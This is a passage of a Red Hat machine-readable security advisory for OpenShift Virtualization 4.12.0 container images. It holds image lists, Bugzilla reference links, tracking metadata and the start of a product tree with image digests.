(CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nRHEL-8-CNV-4.12\n\n==============\n\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2023:0408", url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "1719190", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1719190", }, { category: "external", summary: "2023393", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2023393", }, { category: "external", summary: "2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "2040377", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2040377", }, { category: "external", summary: "2046298", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2046298", }, { category: "external", summary: "2052556", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052556", }, { category: "external", summary: "2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "2060499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2060499", }, { category: "external", summary: "2069098", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2069098", }, { category: "external", summary: "2070366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070366", }, { category: "external", summary: "2071491", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071491", }, { category: "external", summary: "2072797", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2072797", }, { category: "external", summary: "2072821", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2072821", }, { category: "external", summary: "2079916", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079916", }, { category: "external", summary: "2084085", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084085", }, { category: "external", summary: "2086285", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086285", }, { category: "external", summary: "2086551", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086551", }, { category: "external", summary: "2087724", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087724", }, { category: "external", summary: "2088129", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088129", }, { category: "external", summary: "2088464", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088464", }, { category: "external", summary: "2089391", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089391", }, { category: "external", summary: "2089744", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089744", }, { category: "external", summary: "2089751", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089751", }, { category: "external", summary: "2089804", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089804", }, { category: "external", summary: "2091856", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091856", }, { category: "external", summary: "2092793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092793", }, { category: "external", summary: "2092796", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092796", }, { category: "external", summary: "2093771", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093771", }, { category: "external", summary: "2093996", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093996", }, { category: "external", summary: "2094202", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094202", }, { category: "external", summary: "2096285", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096285", }, { category: "external", summary: "2096780", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096780", }, { category: "external", summary: "2097436", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097436", }, { category: "external", summary: "2097586", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097586", }, { category: "external", summary: "2099556", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099556", }, { category: "external", summary: "2099573", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099573", }, { category: "external", summary: "2099923", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099923", }, { category: "external", summary: "2100290", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100290", }, { category: "external", summary: "2100436", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100436", }, { category: "external", summary: "2100442", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100442", }, { category: "external", summary: "2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "2100629", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100629", }, { category: "external", summary: "2100679", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100679", }, { category: "external", summary: "2100682", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100682", }, { category: "external", summary: "2100684", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100684", }, { category: "external", summary: "2101144", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101144", }, { category: "external", summary: "2101164", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101164", }, { category: "external", summary: "2101167", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101167", }, { category: "external", summary: "2101333", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101333", }, { category: "external", summary: "2101335", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101335", }, { category: "external", summary: "2101390", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101390", }, { category: "external", summary: "2101394", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101394", }, { category: "external", summary: "2101423", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101423", }, { category: "external", summary: "2101430", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101430", }, { category: "external", summary: "2101445", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101445", }, { category: "external", summary: "2101454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101454", }, { category: "external", summary: "2101499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101499", }, { category: "external", summary: "2101501", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101501", }, { category: "external", summary: "2101628", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101628", }, { category: "external", summary: "2101667", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101667", }, { category: "external", summary: "2101681", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101681", }, { category: "external", summary: "2102074", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102074", }, { category: "external", summary: "2102125", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102125", }, { category: "external", summary: "2102132", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102132", }, { category: "external", summary: "2102138", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102138", }, { category: "external", summary: "2102256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102256", }, { category: "external", summary: "2102448", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102448", }, { category: "external", summary: "2102475", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102475", }, { category: "external", summary: "2102561", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102561", }, { category: "external", summary: "2102737", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102737", }, { category: "external", summary: "2102740", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102740", }, { category: "external", summary: "2103806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103806", }, { category: "external", summary: "2103807", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103807", }, { category: "external", summary: "2103817", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103817", }, { category: "external", summary: "2103844", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103844", }, { category: "external", summary: "2104331", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104331", }, { category: "external", summary: "2104402", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104402", }, { category: "external", summary: "2104422", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104422", }, { category: "external", summary: "2104424", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104424", }, { category: "external", summary: "2104479", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104479", }, { category: "external", summary: "2104480", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104480", }, { category: "external", summary: "2104785", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104785", }, { category: "external", summary: "2104859", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104859", }, { category: "external", summary: "2105257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2105257", }, { category: "external", summary: "2106175", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106175", }, { category: "external", summary: "2106963", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106963", }, { category: "external", summary: "2107279", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107279", }, { category: "external", summary: "2107342", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", }, { category: "external", summary: "2107371", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { category: "external", summary: "2107374", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { category: "external", summary: "2107376", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", }, { category: "external", summary: "2107383", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { category: "external", summary: "2107386", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { category: "external", summary: "2107388", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { category: "external", summary: "2107390", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", }, { category: "external", summary: "2107392", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", }, { category: "external", summary: "2108339", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2108339", }, { category: "external", summary: "2108638", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2108638", }, { category: "external", summary: "2109818", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2109818", }, { category: "external", summary: "2109975", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2109975", }, { category: "external", summary: "2110256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110256", }, { category: "external", summary: "2110562", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110562", }, { category: "external", summary: "2111240", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111240", }, { category: "external", summary: "2111292", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111292", }, { category: "external", summary: "2111328", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111328", }, { category: "external", summary: "2111378", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111378", }, { category: "external", summary: "2111744", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111744", }, { category: "external", summary: "2111794", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111794", }, { category: "external", summary: "2112900", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2112900", }, { category: "external", summary: "2114516", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2114516", }, { category: "external", summary: "2114636", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2114636", }, { category: "external", summary: "2114683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2114683", }, { category: "external", summary: "2115257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115257", }, { category: "external", summary: "2115258", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115258", }, { category: "external", summary: "2115280", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115280", }, { category: "external", summary: "2115769", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115769", }, { category: "external", summary: "2116225", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2116225", }, { category: "external", summary: "2116644", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2116644", }, { category: "external", summary: "2117549", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117549", }, { category: "external", summary: "2117803", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117803", }, { category: "external", summary: "2117813", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117813", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "2118257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118257", }, { category: "external", summary: "2118823", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118823", }, { category: "external", summary: "2119069", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119069", }, { category: "external", summary: "2119128", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119128", }, { category: "external", summary: "2119309", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119309", }, { category: "external", summary: "2119615", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119615", }, { category: "external", summary: "2120907", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2120907", }, { category: "external", summary: "2121320", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2121320", }, { category: "external", summary: "2122236", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2122236", }, { category: "external", summary: "2122990", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2122990", }, { category: "external", summary: "2124147", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124147", }, { category: "external", summary: "2124307", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124307", }, { category: "external", summary: "2124528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124528", }, { category: "external", summary: "2124555", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124555", }, { category: "external", summary: "2124557", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124557", }, { category: "external", summary: "2124558", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124558", }, { category: "external", summary: "2124565", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124565", }, { category: "external", summary: "2124572", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124572", }, { category: "external", summary: "2124582", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124582", }, { category: "external", summary: "2124594", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124594", }, { category: "external", summary: "2124597", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124597", }, { category: "external", summary: "2126104", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2126104", }, { category: "external", summary: "2126397", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2126397", }, { category: "external", summary: "2127787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127787", }, { category: "external", summary: "2127843", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127843", }, { category: "external", summary: "2127931", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127931", }, { category: "external", summary: "2127947", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127947", }, { category: "external", summary: "2128002", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128002", }, { category: "external", summary: "2128107", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128107", }, { category: "external", summary: "2128872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128872", }, { category: "external", summary: "2128948", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128948", }, { category: "external", summary: "2128949", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128949", }, { category: "external", summary: "2128997", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128997", }, { category: "external", summary: "2129013", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129013", }, { category: "external", summary: "2129234", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129234", }, { category: "external", summary: "2129301", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129301", }, { category: "external", summary: "2129870", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129870", }, { category: "external", summary: "2130509", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130509", }, { category: "external", summary: "2130588", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130588", }, { category: "external", summary: "2130695", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130695", }, { category: "external", summary: "2130909", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130909", }, { category: "external", summary: "2131157", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2131157", }, { category: "external", summary: "2131165", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2131165", }, { category: "external", summary: "2131674", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2131674", }, { category: "external", summary: "2132031", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132031", }, { category: "external", summary: "2132682", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132682", }, { category: "external", summary: "2132721", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132721", }, { category: "external", summary: "2132744", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132744", }, { category: "external", summary: "2132746", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132746", }, { category: "external", summary: "2132783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132783", }, { category: "external", summary: "2132793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132793", }, { category: "external", summary: "2132932", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132932", }, { category: "external", summary: "2133540", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133540", }, { category: "external", summary: "2133541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133541", }, { category: "external", summary: "2133542", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133542", }, { category: "external", summary: "2133543", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133543", }, { category: "external", summary: "2133655", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133655", }, { category: "external", summary: "2133656", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133656", }, { category: "external", summary: "2133659", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133659", }, { category: "external", summary: "2133660", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133660", }, { category: "external", summary: "2134123", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2134123", }, { category: "external", summary: "2134672", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2134672", }, { category: "external", summary: "2134825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2134825", }, { category: "external", summary: "2135805", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2135805", }, { category: "external", summary: "2136051", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2136051", }, { category: "external", summary: "2136425", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2136425", }, { category: "external", summary: "2136534", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2136534", }, { category: "external", summary: "2137123", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137123", }, { category: "external", summary: "2137241", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137241", }, { category: "external", summary: "2137243", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137243", }, { category: "external", summary: "2137349", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137349", }, { category: "external", summary: "2137591", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137591", }, { category: "external", summary: "2137731", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137731", }, { category: "external", summary: "2137733", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137733", }, { category: "external", summary: "2137736", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137736", }, { category: "external", summary: "2137896", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137896", }, { category: "external", summary: "2138112", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138112", }, { category: "external", summary: "2138119", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138119", }, { category: "external", summary: "2138199", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138199", }, { category: "external", summary: "2138653", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138653", }, { category: "external", summary: "2138657", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138657", }, { category: "external", summary: "2138664", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138664", }, { category: "external", summary: "2139257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139257", }, { category: "external", summary: "2139260", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139260", }, { category: "external", summary: "2139293", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139293", }, { category: "external", summary: "2139296", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139296", }, { category: "external", summary: "2139299", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139299", }, { category: "external", summary: "2139306", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139306", }, { category: "external", summary: "2139479", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139479", }, { category: "external", summary: "2139574", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139574", }, { category: "external", summary: "2139651", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139651", }, { category: "external", summary: "2139687", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139687", }, { category: "external", summary: "2139738", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139738", }, { category: "external", summary: "2139820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139820", }, { category: "external", summary: "2140117", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140117", }, { category: "external", summary: "2140521", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140521", }, { category: "external", summary: "2140534", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140534", }, { category: "external", summary: "2140627", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140627", }, { category: "external", summary: "2140730", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140730", }, { category: "external", summary: "2140808", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140808", }, { category: "external", summary: "2140977", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140977", }, { category: "external", summary: "2140982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140982", }, { category: "external", summary: "2140998", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140998", }, { category: "external", summary: "2141089", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141089", }, { category: "external", summary: "2141302", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141302", }, { category: "external", summary: "2141399", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141399", }, { category: "external", summary: "2141494", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141494", }, { category: "external", summary: "2141654", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141654", }, { category: "external", summary: "2141711", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141711", }, { category: "external", summary: "2142468", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142468", }, { category: "external", summary: "2142470", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142470", }, { category: "external", summary: "2142511", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142511", }, { category: "external", summary: "2142647", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142647", }, { category: "external", summary: "2142891", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142891", }, { category: "external", summary: "2142929", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142929", }, { category: "external", summary: "2143268", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2143268", }, { category: "external", summary: "2143498", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2143498", }, { category: "external", summary: "2143964", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2143964", }, { category: "external", summary: "2144580", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2144580", }, { category: "external", summary: "2144828", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2144828", }, { category: "external", summary: "2144839", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2144839", }, { category: "external", summary: "2153849", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2153849", }, { category: "external", summary: "2155757", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2155757", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_0408.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.12.0 Images security update", tracking: { current_release_date: "2025-05-02T21:05:42+00:00", generator: { date: "2025-05-02T21:05:42+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.3", }, }, id: "RHSA-2023:0408", initial_release_date: "2023-01-25T11:11:29+00:00", revision_history: [ { date: "2023-01-25T11:11:29+00:00", number: "1", summary: "Initial version", }, { date: "2023-01-25T11:11:29+00:00", number: "2", summary: "Last updated version", }, { date: "2025-05-02T21:05:42+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.12 for RHEL 8", product: { name: "CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.12::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", product_identification_helper: { purl: 